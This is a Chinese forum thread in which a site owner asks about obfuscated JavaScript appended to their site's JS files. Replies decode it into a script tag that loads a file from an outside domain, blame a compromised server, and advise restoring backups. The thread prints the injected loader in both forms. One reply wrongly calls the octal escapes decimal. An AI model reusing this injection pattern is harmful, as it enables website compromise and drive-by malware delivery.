网站里的js文件最后被嵌入恶意js代码
网站里的js文件最后被嵌入恶意js代码,不知道是什么原因,另外这段代码是怎么加密的:
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
------解决方案--------------------还没见过这样子的嵌入代码攻击,好像只是一串数字,想不到怎么应用。
------解决方案--------------------
这些是用10进制表示的UNICODE码,翻译成GB18030
JScript code
<script src="http://w%77w%33.d%64ns.%69nfo/%69%6E%66%6F%2E%6A%73"></script>
------解决方案--------------------
要怎么样彻底清除这个木马?
------解决方案--------------------
这个跟服务器有关
------解决方案--------------------
是服务器被恶意修改了~
------解决方案--------------------
是木马工具批量修改的,清理起来比较麻烦。最好有备份。
检查服务器的漏洞。